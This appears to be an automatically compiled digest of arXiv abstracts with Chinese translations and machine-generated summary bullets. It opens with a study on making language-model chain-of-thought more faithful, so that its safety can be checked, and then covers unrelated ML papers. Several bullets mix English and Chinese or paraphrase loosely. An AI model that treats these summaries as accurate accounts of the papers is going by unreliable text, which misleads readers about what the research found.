    摘要 随着大型语言模型(LLM)承担越来越困难的任务,验证其行为的正确性和安全性也变得更加困难。一种缓解方法是促使 LLM 将其推理外化,例如在回答问题时生成分步推理(思维链,CoT),这些推理或许能让我们检查模型完成任务的过程。然而,这种方法依赖于所陈述的推理忠实地反映模型的实际推理,而事实并非总是如此。为提高 CoT 推理的忠实性,我们让模型通过把问题分解为子问题来生成推理。基于分解的方法在问答任务上表现出色,有时接近 CoT 的水平,同时在多个近期提出的指标上提升了模型所述推理的忠实性。通过让模型在相互独立的上下文中回答更简单的子问题,我们在保留 CoT 部分性能增益的同时,大幅提高了模型生成推理相对于 CoT 的忠实性。我们的结果表明,提升模型生成推理的忠实性是可能的;持续的改进或许能使这种推理帮助我们验证 LLM 行为的正确性和安全性。
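
The decomposition idea can be sketched as a three-stage prompting pipeline; the `llm` function below is a stand-in for whatever model API is used, and the prompts are illustrative rather than the paper's.

```python
# Hypothetical helper standing in for the language model; replace with a real API call.
def llm(prompt: str) -> str:
    return "(model output)"

question = "Which is heavier: the Eiffel Tower or a blue whale?"

# 1) Ask the model to break the question into simpler subquestions.
plan = llm(f"Decompose into subquestions, one per line:\n{question}")
subquestions = [s for s in plan.splitlines() if s.strip()]

# 2) Answer each subquestion in its own context, so later answers cannot
#    silently rely on reasoning that was never stated.
subanswers = [llm(f"Answer concisely:\n{sq}") for sq in subquestions]

# 3) Recompose: answer the original question given only the stated sub-results.
evidence = "\n".join(f"{sq} -> {sa}" for sq, sa in zip(subquestions, subanswers))
final = llm(f"Using only these facts:\n{evidence}\nAnswer: {question}")
print(final)
```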

Efficient Prediction of Peptide Self-assembly through Sequential and Graphical Encoding

  • paper_url: http://arxiv.org/abs/2307.09169
  • repo_url: None
  • paper_authors: Zihan Liu, Jiaqi Wang, Yun Luo, Shuang Zhao, Wenbin Li, Stan Z. Li
  • for: 本文旨在探讨如何将深度学习应用于肽自组装预测,以提高预测精度。
  • methods: 本研究使用了 RNN、LSTM、Transformer 等序列模型以及 GCN、GAT、GraphSAGE 等图模型,系统考察了肽编码方式对预测的影响。
  • results: 研究发现 Transformer 是最强的基于序列编码的深度学习模型,能够准确预测肽的自组装;此外,研究还揭示了不同肽编码方式对预测精度的影响。
    Abstract In recent years, there has been an explosion of research on the application of deep learning to the prediction of various peptide properties, due to the significant development and market potential of peptides. Molecular dynamics has enabled the efficient collection of large peptide datasets, providing reliable training data for deep learning. However, the lack of systematic analysis of the peptide encoding, which is essential for AI-assisted peptide-related tasks, makes it an urgent problem to be solved for the improvement of prediction accuracy. To address this issue, we first collect a high-quality, colossal simulation dataset of peptide self-assembly containing over 62,000 samples generated by coarse-grained molecular dynamics (CGMD). Then, we systematically investigate the effect of peptide encoding of amino acids into sequences and molecular graphs using state-of-the-art sequential (i.e., RNN, LSTM, and Transformer) and structural deep learning models (i.e., GCN, GAT, and GraphSAGE), on the accuracy of peptide self-assembly prediction, an essential physiochemical process prior to any peptide-related applications. Extensive benchmarking studies have proven Transformer to be the most powerful sequence-encoding-based deep learning model, pushing the limit of peptide self-assembly prediction to decapeptides. In summary, this work provides a comprehensive benchmark analysis of peptide encoding with advanced deep learning models, serving as a guide for a wide range of peptide-related predictions such as isoelectric points, hydration free energy, etc.
    摘要 近年来,由于肽的快速发展和市场潜力,将深度学习应用于各类肽性质预测的研究呈爆发式增长。分子动力学使得高效收集大规模肽数据集成为可能,为深度学习提供了可靠的训练数据。然而,肽编码是 AI 辅助肽相关任务的基础,目前对其缺乏系统性分析,这成为提升预测精度亟待解决的问题。为此,我们首先收集了一个高质量、超大规模的肽自组装模拟数据集,包含由粗粒化分子动力学(CGMD)生成的 62,000 余个样本;随后,我们使用最先进的序列模型(RNN、LSTM、Transformer)和结构化深度学习模型(GCN、GAT、GraphSAGE),系统考察了把氨基酸编码为序列或分子图对肽自组装预测精度的影响——肽自组装是任何肽相关应用之前的关键物理化学过程。大量基准实验证明,Transformer 是最强的基于序列编码的深度学习模型,将肽自组装预测的能力推进到十肽。总之,这项工作对先进深度学习模型下的肽编码给出了全面的基准分析,可作为等电点、水合自由能等各类肽相关预测的指南。
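
To make the two encoding routes concrete, here is a minimal sketch: residues mapped to integer tokens for sequential models, and a residue-level chain graph for graph models. The paper's molecular graphs are richer (atom-level structure), so the chain graph below is a simplifying assumption for illustration only.

```python
import numpy as np

AMINO_ACIDS = "ACDEFGHIKLMNPQRSTVWY"
AA_TO_IDX = {aa: i for i, aa in enumerate(AMINO_ACIDS)}

def encode_sequence(peptide: str) -> np.ndarray:
    """Sequential encoding: map each residue to an integer token (input to RNN/Transformer)."""
    return np.array([AA_TO_IDX[aa] for aa in peptide], dtype=np.int64)

def encode_chain_graph(peptide: str):
    """Minimal graph encoding: residues as nodes, backbone bonds as edges (input to a GNN)."""
    n = len(peptide)
    x = np.eye(len(AMINO_ACIDS))[encode_sequence(peptide)]      # one-hot node features
    src, dst = np.arange(n - 1), np.arange(1, n)
    edge_index = np.stack([np.concatenate([src, dst]),          # undirected backbone edges
                           np.concatenate([dst, src])])
    return x, edge_index

tokens = encode_sequence("FFKLVFF")      # a short self-assembling peptide, used only as an example
nodes, edges = encode_chain_graph("FFKLVFF")
print(tokens, nodes.shape, edges.shape)
```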

Multi-Objective Optimization of Performance and Interpretability of Tabular Supervised Machine Learning Models

  • paper_url: http://arxiv.org/abs/2307.08175
  • repo_url: https://github.com/slds-lmu/paper_2023_eagga
  • paper_authors: Lennart Schneider, Bernd Bischl, Janek Thomas
  • for: 提高超参数优化和解释性之间的协同优化,以提高表格数据上的预测性能和解释性。
  • methods: 利用多目标优化问题的方法,将超参数优化和解释性之间的质量考虑为一个单一的优化问题,并通过增加特征选择、交互和 monotonicity 约束来扩展学习算法的搜索空间。
  • results: 在 benchmark 实验中,提出了一种新的进化算法,可以高效地在扩展的搜索空间上进行优化,并在表格数据上提高了性能和解释性的模型。
    Abstract We present a model-agnostic framework for jointly optimizing the predictive performance and interpretability of supervised machine learning models for tabular data. Interpretability is quantified via three measures: feature sparsity, interaction sparsity of features, and sparsity of non-monotone feature effects. By treating hyperparameter optimization of a machine learning algorithm as a multi-objective optimization problem, our framework allows for generating diverse models that trade off high performance and ease of interpretability in a single optimization run. Efficient optimization is achieved via augmentation of the search space of the learning algorithm by incorporating feature selection, interaction and monotonicity constraints into the hyperparameter search space. We demonstrate that the optimization problem effectively translates to finding the Pareto optimal set of groups of selected features that are allowed to interact in a model, along with finding their optimal monotonicity constraints and optimal hyperparameters of the learning algorithm itself. We then introduce a novel evolutionary algorithm that can operate efficiently on this augmented search space. In benchmark experiments, we show that our framework is capable of finding diverse models that are highly competitive or outperform state-of-the-art XGBoost or Explainable Boosting Machine models, both with respect to performance and interpretability.
    摘要 我们提出了一个与模型无关的框架,用于同时优化表格数据上监督机器学习模型的预测性能与可解释性。可解释性通过三个度量来量化:特征稀疏性、特征交互稀疏性以及非单调特征效应的稀疏性。我们将学习算法的超参数优化视为多目标优化问题,从而在一次优化运行中生成在高性能与易解释之间进行不同权衡的多样化模型。我们通过在超参数搜索空间中加入特征选择、交互约束和单调性约束来扩充学习算法的搜索空间,从而实现高效优化。我们证明,该优化问题实际等价于寻找允许在模型中相互交互的被选特征分组的 Pareto 最优集合,以及这些分组的最优单调性约束和学习算法自身的最优超参数。随后,我们提出了一种能在该扩充搜索空间上高效运行的新型进化算法。基准实验表明,我们的框架能够找到在性能与可解释性上均具有高度竞争力、甚至超越当前最优的 XGBoost 或 Explainable Boosting Machine 模型的多样化模型。
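
Since the framework returns a set of models trading off performance against interpretability, the key post-processing step is extracting the Pareto-optimal subset. A small NumPy sketch of non-dominated filtering (with made-up candidate scores) is shown below.

```python
import numpy as np

def pareto_front(points: np.ndarray) -> np.ndarray:
    """Boolean mask of non-dominated points; both objectives are to be maximized."""
    mask = np.ones(len(points), dtype=bool)
    for i in range(len(points)):
        if mask[i]:
            dominated = np.all(points <= points[i], axis=1) & np.any(points < points[i], axis=1)
            mask &= ~dominated
            mask[i] = True
    return mask

# Candidate models: (predictive performance, interpretability score) -- illustrative values.
candidates = np.array([
    [0.91, 0.20], [0.88, 0.55], [0.84, 0.70],
    [0.80, 0.72], [0.78, 0.90], [0.86, 0.40],
])
front = pareto_front(candidates)
print("Pareto-optimal trade-offs:\n", candidates[front])
```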

Discovering User Types: Mapping User Traits by Task-Specific Behaviors in Reinforcement Learning

  • paper_url: http://arxiv.org/abs/2307.08169
  • repo_url: None
  • paper_authors: L. L. Ankile, B. S. Ham, K. Mao, E. Shin, S. Swaroop, F. Doshi-Velez, W. Pan
  • for: 在强化学习(RL)中辅助人类用户时,将用户建模为 RL 代理并研究其关键参数("用户特征"),以指导干预设计。
  • methods: 将用户表示为 RL 代理,研究用户行为(策略类别)与用户特征之间的关系,并提出一种用于研究"用户类型"划分的直观工具。
  • results: 发现看似不同的现实环境拥有相同的用户类型集合,并将这一观察形式化为定义在环境上的等价关系;通过在同一等价类内迁移干预设计,可以快速实现干预的个性化。
    Abstract When assisting human users in reinforcement learning (RL), we can represent users as RL agents and study key parameters, called \emph{user traits}, to inform intervention design. We study the relationship between user behaviors (policy classes) and user traits. Given an environment, we introduce an intuitive tool for studying the breakdown of "user types": broad sets of traits that result in the same behavior. We show that seemingly different real-world environments admit the same set of user types and formalize this observation as an equivalence relation defined on environments. By transferring intervention design between environments within the same equivalence class, we can help rapidly personalize interventions.
    摘要 在强化学习(RL)中辅助人类用户时,我们可以将用户建模为 RL 代理,并研究称为"用户特征"的关键参数,以指导干预设计。我们研究用户行为(策略类别)与用户特征之间的关系。给定一个环境,我们引入一种直观工具来研究"用户类型"的划分,即导致相同行为的宽泛特征集合。我们发现看似不同的现实环境拥有相同的用户类型集合,并将这一观察形式化为定义在环境上的等价关系。通过在同一等价类内的环境之间迁移干预设计,我们可以帮助快速实现干预的个性化。

Integer Factorisation, Fermat & Machine Learning on a Classical Computer

  • paper_url: http://arxiv.org/abs/2308.12290
  • repo_url: None
  • paper_authors: Sam Blake
  • for: 该论文提出了一种基于深度学习的整数分解算法。
  • methods: 该算法利用劳伦斯对费马分解算法的扩展,将整数分解问题转化为二分类问题,并使用大量合成数据进行训练。
  • results: 该论文介绍了算法的实现和一些实验结果,并分析了实验的缺陷。它还呼吁其他研究人员复现、验证和改进这种方法,以确定其可scalability和实用性。
    Abstract In this paper we describe a deep learning--based probabilistic algorithm for integer factorisation. We use Lawrence's extension of Fermat's factorisation algorithm to reduce the integer factorisation problem to a binary classification problem. To address the classification problem, based on the ease of generating large pseudo--random primes, a corpus of training data, as large as needed, is synthetically generated. We will introduce the algorithm, summarise some experiments, analyse where these experiments fall short, and finally put out a call to others to reproduce, verify and see if this approach can be improved to a point where it becomes a practical, scalable factorisation algorithm.
    摘要 在这篇论文中,我们描述了一种基于深度学习的整数分解概率算法。我们利用劳伦斯对费马分解算法的扩展,将整数分解问题转化为二分类问题。针对该分类问题,借助大规模伪随机素数易于生成这一特点,我们按需合成了任意规模的训练数据。我们将介绍该算法,总结一些实验,分析这些实验的不足之处,最后呼吁其他研究者复现、验证并改进这种方法,看它能否发展为一种实用、可扩展的分解算法。
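
For context, the classical Fermat factorisation that the paper builds on searches for n = a² − b² = (a − b)(a + b); the sketch below shows only this textbook search, not Lawrence's extension or the learned classifier.

```python
import math

def fermat_factor(n: int):
    """Classical Fermat factorisation of an odd composite n = a^2 - b^2 = (a - b)(a + b)."""
    assert n % 2 == 1 and n > 1
    a = math.isqrt(n)
    if a * a < n:
        a += 1
    while True:
        b2 = a * a - n
        b = math.isqrt(b2)
        if b * b == b2:
            return a - b, a + b
        a += 1

p, q = fermat_factor(5959)   # 5959 = 59 * 101
print(p, q)
```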

Feedback is All You Need: Real-World Reinforcement Learning with Approximate Physics-Based Models

  • paper_url: http://arxiv.org/abs/2307.08168
  • repo_url: None
  • paper_authors: Tyler Westenbroek, Jacob Levy, David Fridovich-Keil
  • for: 本研究旨在为使用真实世界数据的机器人学习开发高效且可靠的策略优化方法。
  • methods: 本研究使用策略梯度方法,并系统地利用一个(可能高度简化的)第一性原理模型,从而只需少量真实数据即可学习精确的控制策略。
  • results: 本研究通过理论分析和硬件实验,证明了这种方法可以在几分钟的实际数据上学习精确控制策略,并且可以重新使用。
    Abstract We focus on developing efficient and reliable policy optimization strategies for robot learning with real-world data. In recent years, policy gradient methods have emerged as a promising paradigm for training control policies in simulation. However, these approaches often remain too data inefficient or unreliable to train on real robotic hardware. In this paper we introduce a novel policy gradient-based policy optimization framework which systematically leverages a (possibly highly simplified) first-principles model and enables learning precise control policies with limited amounts of real-world data. Our approach $1)$ uses the derivatives of the model to produce sample-efficient estimates of the policy gradient and $2)$ uses the model to design a low-level tracking controller, which is embedded in the policy class. Theoretical analysis provides insight into how the presence of this feedback controller addresses overcomes key limitations of stand-alone policy gradient methods, while hardware experiments with a small car and quadruped demonstrate that our approach can learn precise control strategies reliably and with only minutes of real-world data.
    摘要 我们致力于为使用真实世界数据的机器人学习开发高效且可靠的策略优化方法。近年来,策略梯度方法已成为在仿真中训练控制策略的一种有前景的范式,但这些方法往往数据效率过低或可靠性不足,难以直接在真实机器人硬件上训练。本文提出一种新颖的基于策略梯度的策略优化框架,它系统地利用一个(可能高度简化的)第一性原理模型,使得只需少量真实数据即可学习精确的控制策略。我们的方法 1)利用模型的导数得到样本高效的策略梯度估计;2)利用模型设计一个嵌入策略类中的低层跟踪控制器。理论分析揭示了该反馈控制器如何克服单独使用策略梯度方法的关键局限;在小型汽车和四足机器人上的硬件实验表明,我们的方法只需几分钟的真实数据即可可靠地学习精确的控制策略。

Computing the gradients with respect to all parameters of a quantum neural network using a single circuit

  • paper_url: http://arxiv.org/abs/2307.08167
  • repo_url: https://github.com/gphehub/grad2210
  • paper_authors: Guang Ping He
  • for: 使用参数移位规则计算量子神经网络的梯度时,每个可调参数的梯度都需要对代价函数进行两次计算;当参数总数很大时,量子电路需要被反复调整并运行多次。
  • methods: 我们提出了一种只用单个电路即可计算全部梯度的方法,同时降低电路深度并减少经典寄存器的数量。
  • results: 在真实量子硬件和模拟器上的实验表明,我们的方法的电路编译时间显著短于传统方法,从而在总运行时间上获得加速。
    Abstract When computing the gradients of a quantum neural network using the parameter-shift rule, the cost function needs to be calculated twice for the gradient with respect to a single adjustable parameter of the network. When the total number of parameters is high, the quantum circuit for the computation has to be adjusted and run for many times. Here we propose an approach to compute all the gradients using a single circuit only, with a much reduced circuit depth and less classical registers. We also demonstrate experimentally, on both real quantum hardware and simulator, that our approach has the advantages that the circuit takes a significantly shorter time to compile than the conventional approach, resulting in a speedup on the total runtime.
    摘要 使用参数移位规则计算量子神经网络的梯度时,网络中每一个可调参数的梯度都需要对代价函数进行两次计算;当参数总数很大时,量子电路必须被反复调整并运行多次。我们提出一种方法,只用单个电路即可计算全部梯度,并大幅降低电路深度、减少经典寄存器的数量。我们还在真实量子硬件和模拟器上进行了实验,证明该方法的电路编译时间显著短于传统方法,从而在总运行时间上获得加速。
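
The conventional parameter-shift rule the paper improves on evaluates the cost twice per parameter: ∂C/∂θᵢ = ½[C(θ + (π/2)eᵢ) − C(θ − (π/2)eᵢ)]. Below is a toy NumPy sketch using a product-of-cosines stand-in for a circuit expectation value; the paper's single-circuit construction is not reproduced here.

```python
import numpy as np

def cost(thetas):
    """Toy stand-in for a variational-circuit expectation value, C = prod_i cos(theta_i)."""
    return np.prod(np.cos(thetas))

def parameter_shift_grad(thetas):
    """Conventional rule: each gradient component needs two separate cost evaluations."""
    grads = np.zeros_like(thetas)
    for i in range(len(thetas)):
        shift = np.zeros_like(thetas)
        shift[i] = np.pi / 2
        grads[i] = 0.5 * (cost(thetas + shift) - cost(thetas - shift))
    return grads

thetas = np.array([0.3, 1.1, -0.7])
print("parameter-shift:", parameter_shift_grad(thetas))
print("analytic       :", np.array([-np.sin(thetas[i]) * np.prod(np.cos(np.delete(thetas, i)))
                                     for i in range(3)]))
```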

Neural Stream Functions

  • paper_url: http://arxiv.org/abs/2307.08142
  • repo_url: https://github.com/skywolf829/neuralstreamfunction
  • paper_authors: Skylar Wolfgang Wurster, Hanqi Guo, Tom Peterka, Han-Wei Shen
  • for: 这个论文是为了计算流函数的 neural network 方法,流函数是一种可以描述流体动态的scalar函数,其梯度与给定的vector field正交。
  • methods: 该论文使用了一种 implicit neural network 方法,将输入vector field作为输入,并使用内积loss函数来学习一个流函数。该网络可以将输入坐标映射到流函数值上,并且可以通过梯度内积来保证梯度的正交性。
  • results: 该论文的结果表明,使用这种方法可以生成高质量的流函数解,并且可以根据不同的regularizing loss函数来生成流函数解的不同版本。另外,论文还提供了一些关于如何正确visualize和提取artefact-free的流函数解的建议。
    Abstract We present a neural network approach to compute stream functions, which are scalar functions with gradients orthogonal to a given vector field. As a result, isosurfaces of the stream function extract stream surfaces, which can be visualized to analyze flow features. Our approach takes a vector field as input and trains an implicit neural representation to learn a stream function for that vector field. The network learns to map input coordinates to a stream function value by minimizing the inner product of the gradient of the neural network's output and the vector field. Since stream function solutions may not be unique, we give optional constraints for the network to learn particular stream functions of interest. Specifically, we introduce regularizing loss functions that can optionally be used to generate stream function solutions whose stream surfaces follow the flow field's curvature, or that can learn a stream function that includes a stream surface passing through a seeding rake. We also discuss considerations for properly visualizing the trained implicit network and extracting artifact-free surfaces. We compare our results with other implicit solutions and present qualitative and quantitative results for several synthetic and simulated vector fields.
    摘要 我们提出一种用神经网络计算流函数的方法;流函数是梯度与给定向量场处处正交的标量函数,因此其等值面即为流面,可用于可视化并分析流动特征。我们的方法以向量场为输入,训练一个隐式神经表示来学习该向量场的流函数:网络把输入坐标映射为流函数值,并通过最小化网络输出梯度与向量场的内积来训练。由于流函数的解未必唯一,我们给出了可选的约束,使网络学习特定的目标流函数。具体而言,我们引入了可选的正则化损失,既可以生成其流面沿流场曲率分布的流函数解,也可以学习包含一条穿过给定种子线(seeding rake)的流面的流函数。我们还讨论了如何正确地可视化训练后的隐式网络并提取无伪影的流面。我们将结果与其他隐式解法进行对比,并在多个合成与仿真向量场上给出定性和定量结果。
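
The core training signal is the orthogonality loss ⟨∇f, v⟩² between the network's gradient and the input vector field. A minimal PyTorch sketch is below; note that without the paper's optional regularizers a constant field trivially minimizes this loss, so this only illustrates the loss term, and the analytic test field is an assumption of the example.

```python
import torch
import torch.nn as nn

net = nn.Sequential(nn.Linear(3, 64), nn.Tanh(), nn.Linear(64, 64), nn.Tanh(), nn.Linear(64, 1))
opt = torch.optim.Adam(net.parameters(), lr=1e-3)

def vector_field(x):
    # Assumed analytic test field (rotation about the z-axis); in practice this is the input data.
    return torch.stack([-x[:, 1], x[:, 0], torch.zeros_like(x[:, 0])], dim=1)

for step in range(200):
    x = torch.rand(1024, 3) * 2.0 - 1.0
    x.requires_grad_(True)
    f = net(x)
    grad_f, = torch.autograd.grad(f.sum(), x, create_graph=True)
    v = vector_field(x)
    # Stream-function condition: gradient of the scalar field orthogonal to the flow.
    loss = (torch.sum(grad_f * v, dim=1) ** 2).mean()
    opt.zero_grad()
    loss.backward()
    opt.step()
```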

DynamicFL: Balancing Communication Dynamics and Client Manipulation for Federated Learning

  • paper_url: http://arxiv.org/abs/2308.06267
  • repo_url: None
  • paper_authors: Bocheng Chen, Nikolay Ivanov, Guangjing Wang, Qiben Yan
  • for: 这篇论文的目的是提出一个新的联合学习(Federated Learning,FL)框架,以解决联合学习中的高系统多样性问题。
  • methods: 论文采用专门设计的客户端调度策略,依据对客户端动态网络状况的预测及其训练数据质量来选择客户端;并使用长期贪心的客户端选择策略,以缓解动态网络下短期调度造成的系统性能下降。
  • results: 与现有最先进的客户端选择方案相比,该方法能取得更高的模型精度,而墙钟时间仅为其 18.9%–84.0%;组件级实验和敏感性分析进一步表明了其在各种真实场景下的稳健性。
    Abstract Federated Learning (FL) is a distributed machine learning (ML) paradigm, aiming to train a global model by exploiting the decentralized data across millions of edge devices. Compared with centralized learning, FL preserves the clients' privacy by refraining from explicitly downloading their data. However, given the geo-distributed edge devices (e.g., mobile, car, train, or subway) with highly dynamic networks in the wild, aggregating all the model updates from those participating devices will result in inevitable long-tail delays in FL. This will significantly degrade the efficiency of the training process. To resolve the high system heterogeneity in time-sensitive FL scenarios, we propose a novel FL framework, DynamicFL, by considering the communication dynamics and data quality across massive edge devices with a specially designed client manipulation strategy. \ours actively selects clients for model updating based on the network prediction from its dynamic network conditions and the quality of its training data. Additionally, our long-term greedy strategy in client selection tackles the problem of system performance degradation caused by short-term scheduling in a dynamic network. Lastly, to balance the trade-off between client performance evaluation and client manipulation granularity, we dynamically adjust the length of the observation window in the training process to optimize the long-term system efficiency. Compared with the state-of-the-art client selection scheme in FL, \ours can achieve a better model accuracy while consuming only 18.9\% -- 84.0\% of the wall-clock time. Our component-wise and sensitivity studies further demonstrate the robustness of \ours under various real-life scenarios.
    摘要 联邦学习(FL)是一种分布式机器学习范式,旨在利用数以百万计边缘设备上的去中心化数据训练全局模型。与集中式学习相比,FL 不显式下载客户端数据,从而保护了客户端隐私。然而,面对地理上分散、网络高度动态的边缘设备(如手机、汽车、火车或地铁),聚合所有参与设备的模型更新会在 FL 中造成不可避免的长尾延迟,严重降低训练效率。为了解决时间敏感的 FL 场景中的高度系统异构性,我们提出了一个新的 FL 框架 DynamicFL:它综合考虑海量边缘设备上的通信动态与数据质量,并配以专门设计的客户端调度策略。DynamicFL 根据对客户端动态网络状况的预测及其训练数据质量,主动选择参与模型更新的客户端;其客户端选择中的长期贪心策略解决了动态网络下短期调度导致的系统性能下降问题;此外,为了在客户端性能评估与客户端调度粒度之间取得平衡,我们在训练过程中动态调整观测窗口长度,以优化长期系统效率。与 FL 中最先进的客户端选择方案相比,DynamicFL 能取得更高的模型精度,而墙钟时间仅为其 18.9%–84.0%。组件级实验与敏感性分析进一步证明了 DynamicFL 在各种真实场景下的稳健性。

Heterogeneous graphs model spatial relationships between biological entities for breast cancer diagnosis

  • paper_url: http://arxiv.org/abs/2307.08132
  • repo_url: None
  • paper_authors: Akhila Krishna K, Ravi Kant Gupta, Nikhil Cherian Kurian, Pranav Jeevan, Amit Sethi
  • for: 这篇论文旨在提高乳癌早期检测、诊断和治疗选择的准确性,挑战乳癌病例的多样性。
  • methods: 这篇论文使用graph neural network(GNN)来捕捉乳癌病例中细胞和组织之间的空间关系,并将细胞和组织转换为网络结构,以提高对乳癌病例的检测和诊断。
  • results: 该模型在三个公开的乳腺癌数据集(BRIGHT、BreakHis 和 BACH)上的准确率超过了基于 Transformer 的现有最优方法,同时在参数量上更为高效。
    Abstract The heterogeneity of breast cancer presents considerable challenges for its early detection, prognosis, and treatment selection. Convolutional neural networks often neglect the spatial relationships within histopathological images, which can limit their accuracy. Graph neural networks (GNNs) offer a promising solution by coding the spatial relationships within images. Prior studies have investigated the modeling of histopathological images as cell and tissue graphs, but they have not fully tapped into the potential of extracting interrelationships between these biological entities. In this paper, we present a novel approach using a heterogeneous GNN that captures the spatial and hierarchical relations between cell and tissue graphs to enhance the extraction of useful information from histopathological images. We also compare the performance of a cross-attention-based network and a transformer architecture for modeling the intricate relationships within tissue and cell graphs. Our model demonstrates superior efficiency in terms of parameter count and achieves higher accuracy compared to the transformer-based state-of-the-art approach on three publicly available breast cancer datasets -- BRIGHT, BreakHis, and BACH.
    摘要 乳腺癌的异质性给其早期检测、预后评估和治疗选择带来了相当大的挑战。卷积神经网络往往忽略组织病理图像中的空间关系,这会限制其准确性;图神经网络(GNN)通过编码图像内的空间关系提供了一条有前景的途径。已有研究将组织病理图像建模为细胞图和组织图,但尚未充分挖掘这些生物实体之间相互关系的潜力。本文提出一种新方法,利用异构 GNN 同时捕捉细胞图与组织图之间的空间关系和层级关系,以增强从组织病理图像中提取有用信息的能力。我们还比较了基于交叉注意力的网络与 Transformer 架构在建模组织图和细胞图内复杂关系上的表现。在三个公开的乳腺癌数据集(BRIGHT、BreakHis、BACH)上,我们的模型在参数量上更为高效,并取得了比基于 Transformer 的最新方法更高的准确率。

INFLECT-DGNN: Influencer Prediction with Dynamic Graph Neural Networks

  • paper_url: http://arxiv.org/abs/2307.08131
  • repo_url: https://github.com/banking-analytics-lab/inflect
  • paper_authors: Elena Tiukhova, Emiliano Penaloza, María Óskarsdóttir, Bart Baesens, Monique Snoeck, Cristián Bravo
  • for: 本研究旨在透过 integrate 动态图 neural network 和 recurrent neural network 等技术,提高 influencer 预测的准确性。
  • methods: 本研究提出了一种新的 INFLECT-DGNN 框架, combining 图 neural network 和 recurrent neural network ,并使用 weighted loss functions、Synthetic Minority Oversampling TEchnique (SMOTE) 和 rolling-window strategy。
  • results: 研究结果表明,使用 RNN 编码时间特征并与 GNN 结合使用,能够显著提高 influencer 预测的准确性。 compare various models, demonstrate capture 图表示、时间依赖和使用财务驱动方法评价的重要性。
    Abstract Leveraging network information for predictive modeling has become widespread in many domains. Within the realm of referral and targeted marketing, influencer detection stands out as an area that could greatly benefit from the incorporation of dynamic network representation due to the ongoing development of customer-brand relationships. To elaborate this idea, we introduce INFLECT-DGNN, a new framework for INFLuencer prEdiCTion with Dynamic Graph Neural Networks that combines Graph Neural Networks (GNN) and Recurrent Neural Networks (RNN) with weighted loss functions, the Synthetic Minority Oversampling TEchnique (SMOTE) adapted for graph data, and a carefully crafted rolling-window strategy. To evaluate predictive performance, we utilize a unique corporate data set with networks of three cities and derive a profit-driven evaluation methodology for influencer prediction. Our results show how using RNN to encode temporal attributes alongside GNNs significantly improves predictive performance. We compare the results of various models to demonstrate the importance of capturing graph representation, temporal dependencies, and using a profit-driven methodology for evaluation.
    摘要 利用网络信息进行预测模型已经在多个领域广泛应用。在推荐和目标营销领域中,Influencer detection stands out as an area that could greatly benefit from the incorporation of dynamic network representation due to the ongoing development of customer-brand relationships。为了开发这个想法,我们介绍了 INFLECT-DGNN,一个新的框架 для INFLuencer prEdiCTion with Dynamic Graph Neural Networks,该框架结合图 neural network (GNN) 和回归神经网络 (RNN),并使用负权重函数、Synthetic Minority Oversampling TEchnique (SMOTE) adapted for graph data,以及一种精心制定的滚动窗口策略。为了评估预测性能,我们使用了一个独特的企业数据集,并 derivated a profit-driven evaluation methodology for influencer prediction。我们的结果表明,使用 RNN 来编码时间特征 alongside GNNs 可以显著提高预测性能。我们对各种模型进行比较,以示出捕捉图表示、时间依赖和使用财务驱动的评估方法的重要性。

Tangent Transformers for Composition, Privacy and Removal

  • paper_url: http://arxiv.org/abs/2307.08122
  • repo_url: None
  • paper_authors: Tian Yu Liu, Aditya Golatkar, Stefano Soatto
  • for: 这篇论文提出了一种名为 Tangent Attention Fine-Tuning(TAFT)的方法,用于微调线性化的 Transformer。
  • methods: 该方法围绕预训练初始化点做一阶泰勒展开得到线性化 Transformer;线性化产生的雅可比-向量积可在单次前向传播中计算,使训练和推理成本与原始非线性网络处于同一量级,且参数数量相同。
  • results: 在多种下游视觉分类任务上,用 TAFT 微调的切线 Transformer 可以与微调原始非线性网络相媲美,且参数数量相同;此外,TAFT 在模型组合、并行训练、机器遗忘和差分隐私方面具有多项优势。
    Abstract We introduce Tangent Attention Fine-Tuning (TAFT), a method for fine-tuning linearized transformers obtained by computing a First-order Taylor Expansion around a pre-trained initialization. We show that the Jacobian-Vector Product resulting from linearization can be computed efficiently in a single forward pass, reducing training and inference cost to the same order of magnitude as its original non-linear counterpart, while using the same number of parameters. Furthermore, we show that, when applied to various downstream visual classification tasks, the resulting Tangent Transformer fine-tuned with TAFT can perform comparably with fine-tuning the original non-linear network. Since Tangent Transformers are linear with respect to the new set of weights, and the resulting fine-tuning loss is convex, we show that TAFT enjoys several advantages compared to non-linear fine-tuning when it comes to model composition, parallel training, machine unlearning, and differential privacy.
    摘要 我们提出切线注意力微调(TAFT),一种对线性化 Transformer 进行微调的方法:线性化 Transformer 通过在预训练初始化点附近做一阶泰勒展开得到。我们证明,线性化所产生的雅可比-向量积可以在单次前向传播中高效计算,使训练和推理成本与原始非线性模型处于同一量级,且参数数量相同。此外,在多种下游视觉分类任务上,用 TAFT 微调得到的切线 Transformer 的性能可与微调原始非线性网络相当。由于切线 Transformer 对新的权重集合是线性的,微调损失也因此是凸的,我们证明 TAFT 在模型组合、并行训练、机器遗忘和差分隐私等方面相比非线性微调具有多项优势。
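
A toy sketch of the linearization step: the tangent model is the first-order Taylor expansion of the network in its weights, and the required Jacobian-vector product can be obtained in a single forward-mode pass (here via torch.func.jvp, which requires PyTorch 2.x). The two-parameter model `f` below is a stand-in, not a Transformer.

```python
import torch
from torch.func import jvp

def f(w, x):
    # Toy nonlinear model standing in for a pre-trained network evaluated at inputs x.
    return torch.tanh(w[0] * x) + w[1] * x ** 2

w0 = torch.tensor([0.8, -0.3])        # "pre-trained" weights, kept fixed
delta = torch.tensor([0.05, -0.02])   # fine-tuned update to the weights
x = torch.linspace(-1.0, 1.0, 5)

# Tangent model: f(w0 + delta) ~= f(w0) + J_w f(w0) @ delta.
# The Jacobian-vector product comes out of one forward-mode pass.
y0, jvp_out = jvp(lambda w: f(w, x), (w0,), (delta,))
tangent_pred = y0 + jvp_out

print("nonlinear model :", f(w0 + delta, x))
print("tangent model   :", tangent_pred)
```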

Domain Generalisation with Bidirectional Encoder Representations from Vision Transformers

  • paper_url: http://arxiv.org/abs/2307.08117
  • repo_url: https://github.com/sw-packages/d23c4b6afa05094a23071333bd230aceceec08117355003f5c0ea958e60c9c98
  • paper_authors: Hamza Riaz, Alan F. Smeaton
  • for: 这篇论文主要针对domain generalization问题,即将知识从源领域传递到未见领域,以实现深度学习模型的通用化。
  • methods: 本论文使用了vision transformer(ViT)、LeViT、DeiT和BEIT四种架构进行领域通用化,并在out-of-distribution(OOD)数据上进行初步评估。最终选择了BEIT架构进行进一步的实验。
